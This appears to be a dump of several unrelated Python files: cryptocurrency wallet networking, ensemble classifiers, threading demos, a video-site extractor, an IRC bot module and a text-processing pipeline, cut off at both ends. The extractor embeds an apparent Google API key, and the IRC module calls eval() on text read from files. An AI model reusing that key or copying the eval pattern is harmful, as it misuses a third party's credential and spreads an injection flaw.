self.send([('blockchain.contract.event.get_history',
[hash160, token.contract_addr, TOKEN_TRANSFER_TOPIC])], callback)
def send(self, messages, callback):
'''Messages is a list of (method, params) tuples'''
messages = list(messages)
with self.lock:
self.pending_sends.append((messages, callback))
def process_pending_sends(self):
# Requests needs connectivity. If we don't have an interface,
# we cannot process them.
if not self.interface:
return
with self.lock:
sends = self.pending_sends
self.pending_sends = []
for messages, callback in sends:
for method, params in messages:
r = None
if method.endswith('.subscribe'):
k = self.get_index(method, params)
# add callback to list
l = self.subscriptions.get(k, [])
if callback not in l:
l.append(callback)
self.subscriptions[k] = l
# check cached response for subscriptions
r = self.sub_cache.get(k)
if r is not None and not method.endswith('contract.subscribe'):
self.print_error("cache hit", k)
callback(r)
else:
message_id = self.queue_request(method, params)
self.unanswered_requests[message_id] = method, params, callback
def unsubscribe(self, callback):
'''Unsubscribe a callback to free object references to enable GC.'''
# Note: we can't unsubscribe from the server, so if we receive
# subsequent notifications process_response() will emit a harmless
# "received unexpected notification" warning
with self.lock:
for v in self.subscriptions.values():
if callback in v:
v.remove(callback)
def connection_down(self, server):
'''A connection to server either went down, or was never made.
We distinguish by whether it is in self.interfaces.'''
self.disconnected_servers.add(server)
if server == self.default_server:
self.set_status('disconnected')
if server in self.interfaces:
self.close_interface(self.interfaces[server])
self.notify('interfaces')
for b in self.blockchains.values():
if b.catch_up == server:
b.catch_up = None
def new_interface(self, server, socket):
# todo: get tip first, then decide which checkpoint to use.
self.add_recent_server(server)
interface = Interface(server, socket)
interface.blockchain = None
interface.tip_header = None
interface.tip = 0
interface.mode = 'default'
interface.request = None
self.interfaces[server] = interface
self.queue_request('server.version', [ELECTRUM_VERSION, PROTOCOL_VERSION], interface)
self.queue_request('blockchain.headers.subscribe', [True], interface)
if server == self.default_server:
self.switch_to_interface(server)
#self.notify('interfaces')
def maintain_sockets(self):
'''Socket maintenance.'''
# Responses to connection attempts?
while not self.socket_queue.empty():
server, socket = self.socket_queue.get()
if server in self.connecting:
self.connecting.remove(server)
if socket:
self.new_interface(server, socket)
else:
self.connection_down(server)
# Send pings and shut down stale interfaces
# must use copy of values
for interface in list(self.interfaces.values()):
if interface.has_timed_out():
self.connection_down(interface.server)
elif interface.ping_required():
self.queue_request('server.ping', [], interface)
now = time.time()
# nodes
if len(self.interfaces) + len(self.connecting) < self.num_server:
self.start_random_interface()
if now - self.nodes_retry_time > NODES_RETRY_INTERVAL:
self.print_error('network: retrying connections')
self.disconnected_servers = set([])
self.nodes_retry_time = now
# main interface
if not self.is_connected():
if self.auto_connect:
if not self.is_connecting():
self.switch_to_random_interface()
else:
if self.default_server in self.disconnected_servers:
if now - self.server_retry_time > SERVER_RETRY_INTERVAL:
self.disconnected_servers.remove(self.default_server)
self.server_retry_time = now
else:
self.switch_to_interface(self.default_server)
def request_chunk(self, interface, index):
if index in self.requested_chunks:
return
interface.print_error("requesting chunk %d" % index)
height = index * 2016
self.queue_request('blockchain.block.headers', [height, 2016],
interface)
self.requested_chunks.add(index)
def on_block_headers(self, interface, response):
'''Handle receiving a chunk of block headers'''
error = response.get('error')
result = response.get('result')
params = response.get('params')
blockchain = interface.blockchain
if result is None or params is None or error is not None:
print_error('on get chunk error', error, result, params)
return
height = params[0]
index = height // 2016
if index * 2016 != height or index not in self.requested_chunks:
interface.print_error("received chunk %d (unsolicited)" % index)
return
else:
interface.print_error("received chunk %d" % index)
self.requested_chunks.remove(index)
hexdata = result['hex']
connect = blockchain.connect_chunk(index, hexdata)
if not connect:
self.connection_down(interface.server)
return
# If not finished, get the next chunk
if blockchain.height() < interface.tip:
self.request_chunk(interface, index+1)
else:
interface.mode = 'default'
interface.print_error('catch up done', blockchain.height())
blockchain.catch_up = None
self.notify('updated')
def request_header(self, interface, height):
#interface.print_error("requesting header %d" % height)
height = max(height, 0)
self.queue_request('blockchain.block.get_header', [height], interface)
interface.request = height
interface.req_time = time.time()
def on_get_header(self, interface, response):
'''Handle receiving a single block header'''
header = response.get('result')
if not header:
interface.print_error(response)
self.connection_down(interface.server)
return
height = header.get('block_height')
# print_error('[on_get_header] {} {}'.format(height, interface.mode))
if interface.request != height:
interface.print_error("unsolicited header", interface.request, height)
self.connection_down(interface.server)
return
chain = blockchain.check_header(header)
if interface.mode == 'backward':
can_connect = blockchain.can_connect(header)
if can_connect and can_connect.catch_up is None:
interface.mode = 'catch_up'
interface.blockchain = can_connect
interface.blockchain.save_header(header)
next_height = height + 1
interface.blockchain.catch_up = interface.server
elif chain:
interface.print_error("binary search")
interface.mode = 'binary'
interface.blockchain = chain
interface.good = height
next_height = (interface.bad + interface.good) // 2
else:
if height == 0:
self.connection_down(interface.server)
next_height = None
else:
interface.bad = height
interface.bad_header = header
delta = interface.tip - height
next_height = max(0, interface.tip - 2 * delta)
elif interface.mode == 'binary':
if chain:
interface.good = height
interface.blockchain = chain
else:
interface.bad = height
interface.bad_header = header
if interface.bad != interface.good + 1:
next_height = (interface.bad + interface.good) // 2
elif not interface.blockchain.can_connect(interface.bad_header, check_height=False):
self.connection_down(interface.server)
next_height = None
else:
branch = self.blockchains.get(interface.bad)
if branch is not None:
if branch.check_header(interface.bad_header):
interface.print_error('joining chain', interface.bad)
next_height = None
elif branch.parent().check_header(header):
interface.print_error('reorg', interface.bad, interface.tip)
interface.blockchain = branch.parent()
next_height = None
else:
interface.print_error('checkpoint conflicts with existing fork', branch.path())
branch.write(b'', 0)
branch.save_header(interface.bad_header)
interface.mode = 'catch_up'
interface.blockchain = branch
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
bh = interface.blockchain.height()
next_height = None
if bh > interface.good:
if not interface.blockchain.check_header(interface.bad_header):
b = interface.blockchain.fork(interface.bad_header)
self.blockchains[interface.bad] = b
interface.blockchain = b
interface.print_error("new chain", b.checkpoint)
interface.mode = 'catch_up'
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
assert bh == interface.good
if interface.blockchain.catch_up is None and bh < interface.tip:
interface.print_error("catching up from %d"% (bh + 1))
interface.mode = 'catch_up'
next_height = bh + 1
interface.blockchain.catch_up = interface.server
self.notify('updated')
elif interface.mode == 'catch_up':
can_connect = interface.blockchain.can_connect(header)
if can_connect:
interface.blockchain.save_header(header)
next_height = height + 1 if height < interface.tip else None
else:
# go back
interface.print_error("cannot connect", height)
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
next_height = height - 1
if next_height is None:
# exit catch_up state
interface.print_error('catch up done', interface.blockchain.height())
interface.blockchain.catch_up = None
self.switch_lagging_interface()
self.notify('updated')
else:
raise Exception(interface.mode)
# If not finished, get the next header
if next_height:
if interface.mode == 'catch_up' and interface.tip > next_height + 50:
self.request_chunk(interface, next_height // CHUNK_SIZE)
else:
self.request_header(interface, next_height)
else:
interface.mode = 'default'
interface.request = None
self.notify('updated')
# refresh network dialog
self.notify('interfaces')
def maintain_requests(self):
for interface in list(self.interfaces.values()):
if interface.request and time.time() - interface.request_time > 20:
interface.print_error("blockchain request timed out")
self.connection_down(interface.server)
continue
def wait_on_sockets(self):
# Python docs say Windows doesn't like empty selects.
# Sleep to prevent busy looping
if not self.interfaces:
time.sleep(0.1)
return
rin = [i for i in self.interfaces.values()]
win = [i for i in self.interfaces.values() if i.num_requests()]
try:
rout, wout, xout = select.select(rin, win, [], 0.1)
except (socket.error, OSError) as e:
print_error('[wait_on_sockets]', e)
return
# TODO: py3, get code from e
# code = None
# if code == errno.EINTR:
# return
# raise
assert not xout
for interface in wout:
interface.send_requests()
for interface in rout:
self.process_responses(interface)
def init_headers_file(self):
pass
# b = self.blockchains[0]
# if b.get_hash(0) == bitcoin.GENESIS:
# self.downloading_headers = False
# return
# filename = b.path()
# def download_thread():
# try:
# import urllib.request, socket
# socket.setdefaulttimeout(30)
# self.print_error("downloading ", bitcoin.HEADERS_URL)
# urllib.request.urlretrieve(bitcoin.HEADERS_URL, filename + '.tmp')
# os.rename(filename + '.tmp', filename)
# self.print_error("done.")
# except Exception:
# self.print_error("download failed. creating file", filename)
# # open(filename, 'wb+').close()
# b = self.blockchains[0]
# with b.lock: b.update_size()
# self.downloading_headers = False
# self.downloading_headers = True
# t = threading.Thread(target = download_thread)
# t.daemon = True
# t.start()
def run(self):
# self.init_headers_file()
#
# while self.is_running() and self.downloading_headers:
# time.sleep(1)
while self.is_running():
self.maintain_sockets()
self.wait_on_sockets()
self.maintain_requests()
self.run_jobs() # Synchronizer and Verifier
self.process_pending_sends()
self.stop_network()
self.on_stop()
def on_notify_header(self, interface, header_dict):
header_hex, height = header_dict['hex'], header_dict['height']
header = blockchain.deserialize_header(bfh(header_hex), height)
height = header.get('block_height')
if not height:
return
interface.tip_header = header
interface.tip = height
if interface.mode != 'default':
return
b = blockchain.check_header(header)
if b:
interface.blockchain = b
self.switch_lagging_interface()
self.notify('interfaces')
return
b = blockchain.can_connect(header)
if b:
interface.blockchain = b
b.save_header(header)
self.switch_lagging_interface()
self.notify('updated')
self.notify('interfaces')
self.notify('updated')
return
tip = max([x.height() for x in self.blockchains.values()])
if tip >=0:
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
self.request_header(interface, min(tip, height - 1))
else:
chain = self.blockchains[0]
if chain.catch_up is None:
chain.catch_up = interface
interface.mode = 'catch_up'
interface.blockchain = chain
self.request_header(interface, 0)
def blockchain(self):
if self.interface and self.interface.blockchain is not None:
self.blockchain_index = self.interface.blockchain.checkpoint
return self.blockchains[self.blockchain_index]
def get_blockchains(self):
out = {}
for k, b in self.blockchains.items():
r = list(filter(lambda i: i.blockchain == b, list(self.interfaces.values())))
if r:
out[k] = r
return out
def follow_chain(self, index):
blockchain = self.blockchains.get(index)
if blockchain:
self.blockchain_index = index
self.config.set_key('blockchain_index', index)
for i in self.interfaces.values():
if i.blockchain == blockchain:
self.switch_to_interface(i.server)
break
else:
raise Exception('blockchain not found', index)
if self.interface:
server = self.interface.server
host, port, protocol, proxy, auto_connect = self.get_parameters()
host, port, protocol = server.split(':')
self.set_parameters(host, port, protocol, proxy, auto_connect)
def get_local_height(self):
self.blockchain().update_size()
return self.blockchain().height()
def synchronous_get(self, request, timeout=30):
q = queue.Queue()
self.send([request], q.put)
try:
r = q.get(True, timeout)
except queue.Empty:
raise Exception('Server did not answer')
if r.get('error'):
raise Exception(r.get('error'))
return r.get('result')
def broadcast(self, tx, timeout=30):
tx_hash = tx.txid()
try:
out = self.synchronous_get(('blockchain.transaction.broadcast', [str(tx)]), timeout)
except BaseException as e:
return False, "error: " + str(e)
if out != tx_hash:
return False, "error: " + out
return True, out
|
ensemble.py | __author__ = 'Prateek'
import time
import math
import numpy as np
import copy
from decisiontree import DecisiontreeClassifier
from multiprocessing import Process, Queue
class BaggingClassifier():
'''
Bagging classifier is meta-algorithm that builds a number of estimators on bootstrapped(with replacement)
versions of the training dataset. Bagging is used on estimators which have high variance like a decision
tree that has memorized the data i.e. there is a tree path for each data point. The prediction is done
using various combination functions like weighted mean, average, max, min etc.
'''
def __init__(self, baseEstimator=None, n_estimators=10, bootstrap=True, random_state=None, max_depth=None):
'''
:param baseEstimator: the estimator to be used(default: Decision Tree)
:param n_estimators: number of estimators to be used
:param bootstrap: create bootstrap sample of data set(default True)
:param random_state: random seed
:param max_depth: max depth of the decision tree (default is None)
'''
self.baseEstimator = baseEstimator
self.n_estimators = n_estimators
self.bootstrap = bootstrap
self.random_state = random_state
self.Classifiers = Queue()
self.max_depth = max_depth
def fit(self, Xtrain, ytrain):
start = time.time()
# set the random seed for reproducibility of experiment
if self.random_state is not None:
np.random.seed(self.random_state)
# Check if base estimator is specified otherwise use decision tree
if self.baseEstimator is None:
self.baseEstimator = DecisiontreeClassifier(max_depth=self.max_depth, usePes=False)
'Start multiprocessing'
jobs = []
for i in range(5):
'Generate random indices with replacement'
ind = np.random.choice(a=Xtrain.shape[0], size=Xtrain.shape[0], replace=True)
'Pass the bootstrapped dataset to the process'
p = Process(target=self._fitparallel, args=(Xtrain[ind], ytrain[ind]))
jobs.append(p)
p.start()
'Join the processes'
for proc in jobs:
proc.join()
# end = time.time()
# print('Total time:', end - start)
'Function that will be called by the proecess to train the decision tree.'
def _fitparallel(self,Xtrain,ytrain):
classifier = copy.copy(self.baseEstimator)
classifier.fit(Xtrain, ytrain)
'save the trained classifier in queue'
self.Classifiers.put(classifier)
def predict(self, Xtest):
'''
:param Xtest: test data
:return: predictions
'''
multiplePred = []
pred = []
for _ in range(self.Classifiers.qsize()):
multiplePred.append(self.Classifiers.get().predict(Xtest))
for j in range(Xtest.shape[0]):
singlepred = []
for i in range(len(multiplePred)):
singlepred.append(multiplePred[i][j])
pred.append(max(set(singlepred), key=singlepred.count))
return np.array(pred)
class AdaboostClassifier():
'''
Adaboost classifier uses number of estimators with high bias like a decision tree stump
and fits them on the dataset such that the subsequent estimators build on the mistakes
of the previous estimators by increasing the weight of the samples which were incorrectly
classified. This can be achieved by two methods:
1. Sample more of the incorrectly classified data points and learn an estimator on them,
but the error is calculated using the whole data set.
2. Use a estimator than can handle sample weights like a decision tree which calculates
weighted information gain.
'''
def __init__(self, baseEstimator=None, n_estimators=10, random_state=None, max_depth=1, useSampling=False,
verbose=False):
'''
:param baseEstimator: the estimator to be used(default: Decision Tree)
:param n_estimators: number of estimators to be used
:param random_state: random seed
:param max_depth: max depth of the decision tree (default is decision stump)
:param useSampling: Used to sample more of the incorrect predicted points(default False) Not implemented yet
:param verbose: used to print out the values while calculating(default False)
'''
self.baseEstimator = baseEstimator
self.n_estimators = n_estimators
self.random_state = random_state
self.Classifiers = []
self.max_depth = max_depth
self.useSampling = useSampling
self.verbose = verbose
def fit(self, Xtrain, ytrain):
'''
:param Xtrain: training data
:param ytrain: training labels
:return: None
'''
# set the random seed for reproducibility of experiment
if self.random_state != None:
np.random.seed(self.random_state)
# Check if base estimator is specified otherwise use decision tree
if self.baseEstimator == None:
self.baseEstimator = DecisiontreeClassifier(max_depth=self.max_depth)
'Initialize the weights of data points to a uniform distribution'
D = np.array([1 / (Xtrain.shape[0] * 1.0) for _ in range(Xtrain.shape[0])])
for i in range(self.n_estimators):
classifier = copy.copy(self.baseEstimator)
if self.useSampling == True:
ind = np.random.choice(a=Xtrain.shape[0], size=Xtrain.shape[0], p = D)
'to be implemented'
else:
classifier.sampleWeights = D
classifier.fit(Xtrain, ytrain)
pred = np.array(classifier.predict(Xtrain))
pred = pred.reshape((pred.shape[0], 1))
weightedError = 0
for j in range(Xtrain.shape[0]):
if pred[j] != ytrain[j]:
weightedError += D[j]
alpha = (1 / 2) * np.log((1 - weightedError) / (weightedError))
if self.verbose == True:
print('weighted error', weightedError)
print('alpha:', alpha)
self.Classifiers.append((classifier, alpha))
for j in range(Xtrain.shape[0]):
if pred[j] != ytrain[j]:
D[j] *= math.exp(alpha)
else:
D[j] *= math.exp(-alpha)
'Normalize the weights of data points'
sumofWeights = np.sum(D)
D = np.array([x / sumofWeights for x in D])
def predict(self, Xtest):
'''
:param Xtest: test data
:return: predictions {0,1}
'''
multiplePred = []
pred = []
for classifier, weight in self.Classifiers:
multiplePred.append((classifier.predict(Xtest), weight))
for j in range(Xtest.shape[0]):
singlepred = 0
for i in range(len(self.Classifiers)):
singlepred += multiplePred[i][0][j] * multiplePred[i][1]
if singlepred >= 0:
pred.append(1)
else:
pred.append(0)
return np.array(pred)
|
tkinter-threading.py | from mktinter import *
import tkinter.ttk as ttk
import time
import threading
def callback():
total = sum(range(100000000))
print(total)
#label.config(text=total)
def handle_click():
t.start()
def move_progress():
for i in range(20):
pb.step()
root.update()
time.sleep(.02)
root = Tk()
t = threading.Thread(target=callback, daemon=True)
Button(root, text='Add it up', command=handle_click).pack()
pgMove = Button(root)
pgMove['text'] = "Move"
pgMove['fg'] = "green"
pgMove['command'] = move_progress
pgMove.pack()
pb = ttk.Progressbar(root, orient='horizontal', length=400, mode='determinate')
pb.pack()
label = Label(root)
label.pack()
root.mainloop() |
youtubeExternallinkSite.py | # coding: utf-8
import re
import threading
from ..extractor.common import InfoExtractor
from ..utils import (
compat_urllib_parse,
parse_duration,
)
class YoutubeExternallinkSiteIE(InfoExtractor):
_VALID_URL = r'https?://(.*\.)napster.com/artist/(.*)track/.*'
_TEST = {
'url': 'http://gb.napster.com/artist/madness/album/keep-moving-salvo/track/wings-of-a-dove',
}
def __init__(self):
self._lock = threading.Lock()
def getVideoInfo(self, vid):
url = 'https://www.googleapis.com/youtube/v3/videos?part=snippet%2CcontentDetails' \
'&key=AIzaSyBW7ikTCKkhOZqSPUPkf5xVw12cjYKI5Ag&id=' + vid
data = self._download_json(url, url)
return {
'id': vid,
'url': 'https://www.youtube.com/watch?v=%s' % vid,
'title': data['items'][0]['snippet']['title'],
'thumbnail': data['items'][0]['snippet']['thumbnails']['default'],
'description': data['items'][0]['snippet']['description'],
'duration': parse_duration(data['items'][0]['contentDetails']['duration']),
}
def getEntries(self, querylist):
entries = []
for track, artist, duration in querylist:
entries.append({
'id': None,
'title': track,
'artist': artist,
'duration': duration,
})
return entries
def appendEntry(self, entries, entry):
self._lock.acquire()
try:
entries.append(entry)
finally:
self._lock.release()
def getVideoInfoEx(self, url, artist, track, duration, entries):
print(url)
try:
data = self._download_json(url, url)
info = self.getVideoInfo(data['id'])
if info.get('duration','') == '':
info['duration'] = duration
if info.get('artist','') == '':
info['artist'] = artist
self.appendEntry(entries, info)
except Exception as e:
'''
self.appendEntry(entries, {
'id': None,
'title': track,
'artist': artist,
'duration': duration,
})
'''
print('getVideoInfo %s exception: %s' % (url, e.message))
pass
def getEntriesEx(self, querylist):
if (len(querylist)>0):
list = []
if len(querylist[0]) > 2:
list = [('http://groovesharks.org/music/getYoutube/?' +
compat_urllib_parse.urlencode({'track': track, 'artist': artist}), artist, track, duration) for track, artist, duration in querylist]
else:
list = [('http://groovesharks.org/music/getYoutube/?' +
compat_urllib_parse.urlencode({'track': track, 'artist': artist}), artist, track, '') for artist, track in querylist]
threadList = []
entries = []
for url, artist, track, duration in list:
try:
t = threading.Thread(target=self.getVideoInfoEx, args=(url, artist, track, duration, entries))
threadList.append(t)
t.setDaemon(True)
t.start()
except:
pass
for t in threadList:
t.join()
return entries
else:
return []
def getVideoInfByID(self, VID, entries):
try:
info = self.getVideoInfo(VID)
if info.get('duration','') == '':
info['duration'] = '3:40'
if info.get('artist','') == '':
info['artist'] = 'unkown'
self.appendEntry(entries, info)
except Exception as e:
'''
self.appendEntry(entries, {
'id': None,
'title': track,
'artist': artist,
'duration': duration,
})
'''
print('getVideoInfo %s exception: %s' % (VID, e.message))
pass
def getEntriesByID(self, VIDS):
if (len(VIDS)>0):
threadList = []
entries = []
for ID in VIDS:
try:
t = threading.Thread(target=self.getVideoInfByID, args=(ID, entries))
threadList.append(t)
t.setDaemon(True)
t.start()
except:
pass
for t in threadList:
t.join()
return entries
else:
return []
|
progress_dict.py | from multiprocessing import Manager, Process
def to_add(d, k, v):
d[k] = v
if __name__ == "__main__":
process_dict = Manager().dict()
p1 = Process(target=to_add, args=(process_dict, 'name', 'li'))
p2 = Process(target=to_add, args=(process_dict, 'age', 13))
p1.start()
p2.start()
p1.join()
p2.join()
print(process_dict)
|
commandsquery.py | # coding=utf-8
from __future__ import unicode_literals, absolute_import, division, print_function
import sopel
from sopel import module
from sopel.tools import stderr
import os
from difflib import SequenceMatcher
from operator import itemgetter
import threading
try:
from sopel_modules.botevents.botevents import *
botevents_installed = True
except ImportError:
botevents_installed = False
import spicemanip
def configure(config):
pass
def setup(bot):
stderr("[Sopel-CommandsQuery] Evaluating Core Commands List")
threading.Thread(target=setup_thread, args=(bot,)).start()
def setup_thread(bot):
bot.memory['Sopel-CommandsQuery'] = dict()
for comtype in ['module', 'nickname', 'rule']:
bot.memory['Sopel-CommandsQuery'][comtype + "_commands"] = dict()
bot.memory['Sopel-CommandsQuery'][comtype + "_commands_count"] = 0
filepathlisting = []
# main Modules directory
main_dir = os.path.dirname(os.path.abspath(sopel.__file__))
modules_dir = os.path.join(main_dir, 'modules')
filepathlisting.append(modules_dir)
# Home Directory
home_modules_dir = os.path.join(bot.config.homedir, 'modules')
if os.path.isdir(home_modules_dir):
filepathlisting.append(home_modules_dir)
# pypi installed
try:
import sopel_modules
pypi_modules = os.path.dirname(os.path.abspath(sopel_modules.__file__))
pypi_modules_dir = os.path.join(pypi_modules, 'modules')
filepathlisting.append(pypi_modules_dir)
except Exception:
pass
# Extra directories
filepathlist = []
for directory in bot.config.core.extra:
filepathlisting.append(directory)
for directory in filepathlisting:
for pathname in os.listdir(directory):
path = os.path.join(directory, pathname)
if (os.path.isfile(path) and path.endswith('.py') and not path.startswith('_')):
filepathlist.append(str(path))
# CoreTasks
ct_path = os.path.join(main_dir, 'coretasks.py')
filepathlist.append(ct_path)
for modulefile in filepathlist:
module_file_lines = []
module_file = open(modulefile, 'r')
lines = module_file.readlines()
for line in lines:
module_file_lines.append(line)
module_file.close()
dict_from_file = dict()
filelinelist = []
for line in module_file_lines:
if str(line).startswith("@"):
line = str(line)[1:]
# Commands
if str(line).startswith(tuple(["commands", "module.commands", "sopel.module.commands"])):
comtype = "module"
line = str(line).split("commands(")[-1]
line = str("(" + line)
validcoms = eval(str(line))
if isinstance(validcoms, tuple):
validcoms = list(validcoms)
else:
validcoms = [validcoms]
validcomdict = {"comtype": comtype, "validcoms": validcoms}
filelinelist.append(validcomdict)
elif str(line).startswith(tuple(["nickname_commands", "module.nickname_commands", "sopel.module.nickname_commands"])):
comtype = "nickname"
line = str(line).split("commands(")[-1]
line = str("(" + line)
validcoms = eval(str(line))
if isinstance(validcoms, tuple):
validcoms = list(validcoms)
else:
validcoms = [validcoms]
nickified = []
for nickcom in validcoms:
nickified.append(str(bot.nick) + " " + nickcom)
validcomdict = {"comtype": comtype, "validcoms": nickified}
filelinelist.append(validcomdict)
elif str(line).startswith(tuple(["rule", "module.rule", "sopel.module.rule"])):
comtype = "rule"
line = str(line).split("rule(")[-1]
validcoms = [str("(" + line)]
validcomdict = {"comtype": comtype, "validcoms": validcoms}
filelinelist.append(validcomdict)
for atlinefound in filelinelist:
comtype = atlinefound["comtype"]
validcoms = atlinefound["validcoms"]
comtypedict = str(comtype + "_commands")
bot.memory['Sopel-CommandsQuery'][comtypedict + "_count"] += 1
# default command to filename
if "validcoms" not in dict_from_file.keys():
dict_from_file["validcoms"] = validcoms
maincom = dict_from_file["validcoms"][0]
if len(dict_from_file["validcoms"]) > 1:
comaliases = spicemanip.main(dict_from_file["validcoms"], '2+', 'list')
else:
comaliases = []
bot.memory['Sopel-CommandsQuery'][comtypedict][maincom] = dict_from_file
for comalias in comaliases:
if comalias not in bot.memory['Sopel-CommandsQuery'][comtypedict].keys():
bot.memory['Sopel-CommandsQuery'][comtypedict][comalias] = {"aliasfor": maincom}
for comtype in ['module_commands', 'nickname_commands', 'rule_commands']:
stderr("[Sopel-CommandsQuery] Found " + str(len(bot.memory['Sopel-CommandsQuery'][comtype].keys())) + " " + comtype + " commands.")
if botevents_installed:
set_bot_event(bot, "Sopel-CommandsQuery")
@module.rule('^\?(.*)')
def query_detection(bot, trigger):
while "Sopel-CommandsQuery" not in bot.memory:
pass
# command must start with
if not str(trigger).startswith(tuple(['?'])):
return
stderr(trigger.args)
commands_list = dict()
for commandstype in bot.memory['Sopel-CommandsQuery'].keys():
if not commandstype.endswith("_count"):
for com in bot.memory['Sopel-CommandsQuery'][commandstype].keys():
if com not in commands_list.keys():
commands_list[com] = bot.memory['Sopel-CommandsQuery'][commandstype][com]
triggerargsarray = spicemanip.main(trigger, 'create')
# command issued, check if valid
querycommand = spicemanip.main(triggerargsarray, 1).lower()[1:]
if len(querycommand) == 1:
commandlist = []
for command in commands_list.keys():
if command.lower().startswith(querycommand):
commandlist.append(command)
if commandlist == []:
bot.notice("No commands match " + str(querycommand) + ".", trigger.nick)
return
else:
bot.notice("The following commands match " + str(querycommand) + ": " + spicemanip.main(commandlist, 'andlist') + ".", trigger.nick)
return
elif querycommand.endswith(tuple(["+"])):
querycommand = querycommand[:-1]
if querycommand not in commands_list.keys():
bot.notice("The " + str(querycommand) + " does not appear to be valid.")
return
realcom = querycommand
if "aliasfor" in commands_list[querycommand].keys():
realcom = commands_list[querycommand]["aliasfor"]
validcomlist = commands_list[realcom]["validcoms"]
bot.notice("The following commands match " + str(querycommand) + ": " + spicemanip.main(validcomlist, 'andlist') + ".", trigger.nick)
return
elif querycommand.endswith(tuple(['?'])):
querycommand = querycommand[:-1]
sim_com, sim_num = [], []
for com in commands_list.keys():
similarlevel = SequenceMatcher(None, querycommand.lower(), com.lower()).ratio()
sim_com.append(com)
sim_num.append(similarlevel)
sim_num, sim_com = (list(x) for x in zip(*sorted(zip(sim_num, sim_com), key=itemgetter(0))))
closestmatch = spicemanip.main(sim_com, 'reverse', "list")
listnumb, relist = 1, []
for item in closestmatch:
if listnumb <= 10:
relist.append(str(item))
listnumb += 1
bot.notice("The following commands may match " + str(querycommand) + ": " + spicemanip.main(relist, 'andlist') + ".", trigger.nick)
return
elif querycommand in commands_list.keys():
bot.notice("The following commands match " + str(querycommand) + ": " + str(querycommand) + ".", trigger.nick)
return
elif not querycommand:
return
else:
commandlist = []
for command in commands_list.keys():
if command.lower().startswith(querycommand):
commandlist.append(command)
if commandlist == []:
bot.notice("No commands match " + str(querycommand) + ".", trigger.nick)
return
else:
bot.notice("The following commands match " + str(querycommand) + ": " + spicemanip.main(commandlist, 'andlist') + ".", trigger.nick)
return
def commandsquery_register(bot, command_type, validcoms, aliasfor=None):
if not isinstance(validcoms, list):
validcoms = [validcoms]
if 'Sopel-CommandsQuery' not in bot.memory:
bot.memory['Sopel-CommandsQuery'] = dict()
if command_type not in bot.memory['Sopel-CommandsQuery'].keys():
bot.memory['Sopel-CommandsQuery'][command_type] = dict()
bot.memory['Sopel-CommandsQuery'][command_type + "_count"] = 0
bot.memory['Sopel-CommandsQuery'][command_type + "_count"] += 1
dict_from_file = dict()
# default command to filename
if "validcoms" not in dict_from_file.keys():
dict_from_file["validcoms"] = validcoms
if not aliasfor:
maincom = dict_from_file["validcoms"][0]
if len(dict_from_file["validcoms"]) > 1:
comaliases = spicemanip.main(dict_from_file["validcoms"], '2+', 'list')
else:
comaliases = []
bot.memory['Sopel-CommandsQuery'][command_type][maincom] = dict_from_file
else:
comaliases = validcoms
for comalias in comaliases:
if comalias not in bot.memory['Sopel-CommandsQuery'][command_type].keys():
bot.memory['Sopel-CommandsQuery'][command_type][comalias] = {"aliasfor": aliasfor}
|
dif-process.py | # Example of processes with different functions
from multiprocessing import Process
import time
def Hello():
print("start hello")
time.sleep(5)
print("hello")
def Hi():
print("start hi")
time.sleep(5)
print("hi there")
hello = Process(target=Hello)
hi = Process(target=Hi)
threads = [hello, hi]
for thread in threads:
thread.start()
|
multicore_run.py | import multiprocessing
from pipeline.entitylinker import *
from pipeline.triplealigner import *
from pipeline.datareader import WikiDataAbstractsDataReader
from pipeline.writer import JsonWriter, JsonlWriter, OutputSplitter, NextFile
from utils.triplereader import *
from pipeline.filter import *
import argparse
from timeit import default_timer
__START_DOC__ = 0 #start reading from document number
__CORES__ = 7
parser = argparse.ArgumentParser(prog=os.path.basename(sys.argv[0]),
formatter_class=argparse.RawDescriptionHelpFormatter,
description=__doc__)
parser.add_argument("--input", default = 'text/ko',
help="XML wiki dump file")
parser.add_argument("--output", default = './out/ko',
help="XML wiki dump file")
parser.add_argument("--input_triples", default = 'data/ko/wikidata-triples-ko-subj.db',
help="XML wiki dump file")
parser.add_argument("--language", default = 'ko',
help="language to use")
args = parser.parse_args()
# Reading the Wikipedia Abstracts Dataset
reader = WikiDataAbstractsDataReader(args.input)
main_ent_lim = MainEntityLimiter()
min_ent_lim = EntityLimiter(2, 100)
min_trip_lim = MinTriplesLimiter(1)
# min_trip_lim = TriplesLimiter(5, 500)
filter_entities = ['Q4167410', 'Q13406463', 'Q18340514', 'Q12308941', 'Q11879590', 'Q101352']
# trip_read = TripleSPARQLReader('./datasets/wikidata/wikidata-triples.csv')
if args.input_triples.endswith('.db'):
trip_read = TripleDBReader(args.input_triples, args.language)
else:
trip_read = TripleCSVReader(args.input_triples, args.language)
Salign = SimpleAligner(trip_read)
#prop = WikidataPropertyLinker('./datasets/wikidata/wikidata-properties.csv')
if args.language == 'zh':
spacy_model = 'zh_core_web_sm'
elif args.language == 'en':
spacy_model = 'en_core_web_sm'
elif args.language == 'es' or args.language == 'ca':
spacy_model = 'es_core_news_sm'
elif args.language == 'it':
spacy_model = 'it_core_news_sm'
else:
spacy_model = 'xx_ent_wiki_sm'
# date = DateLinkerSpacy(spacy_model)
date = DateLinkerRegex(args.language)
#SPOalign = SPOAligner(trip_read)
NSalign = NoSubjectAlign(trip_read)
# writer = JsonlWriter(args.output, "re-nlg", filesize=5000, startfile=__START_DOC__)
nextFile = NextFile(args.output)
output = OutputSplitter(nextFile, 5000, False)
def multhithreadprocess(q, output_queue):
while True:
d = q.get()
if d is None:
break
if trip_read.get_exists(d.uri, 'P31', filter_entities):
continue
d = date.run(d)
# d = date.run(d)
if not main_ent_lim.run(d):
# output_queue.put('skip')
continue
if not min_ent_lim.run(d):
# output_queue.put('skip')
continue
d = NSalign.run(d)
d = Salign.run(d)
if not min_trip_lim.run(d):
# output_queue.put('skip')
continue
output_queue.put(d)
def reduce_process(output_queue, output):
"""Pull finished article text, write series of files (or stdout)
:param output_queue: text to be output.
:param output: file object where to print.
"""
print('reduce_process')
period = 5000
interval_start = default_timer()
# FIXME: use a heap
ordering_buffer = {} # collected pages
next_ordinal = 0 # sequence number of pages
while True:
d = output_queue.get()
if d is None:
break
if d == 'skip':
continue
output.run(d)
next_ordinal += 1
if next_ordinal % period == 0:
interval_rate = period / (default_timer() - interval_start)
